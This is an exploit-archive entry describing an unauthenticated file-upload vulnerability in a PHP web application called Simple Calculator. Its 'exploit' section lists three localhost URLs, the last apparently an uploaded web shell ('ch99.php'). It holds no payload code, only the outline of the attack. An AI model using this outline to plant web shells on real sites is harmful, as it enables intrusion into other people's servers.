id: 11535
date: 03/30/2010
title: Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability
author: indoushka
cves: 

===================================================================
Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability 
===================================================================

========================================================================================                 
| # Title    : Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                 
| # Tested on: Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Remote Upload                                                            
======================      Exploit By indoushka       =================================
 # Exploit  :
  
     1- http://127.0.0.1/upload/index.upload.php (index page)
      
     2- http://127.0.0.1/upload/upload.php (Upload Page)
      
     3- http://127.0.0.1/upload/ch99.php



#  0day.today [2023-03-22]  #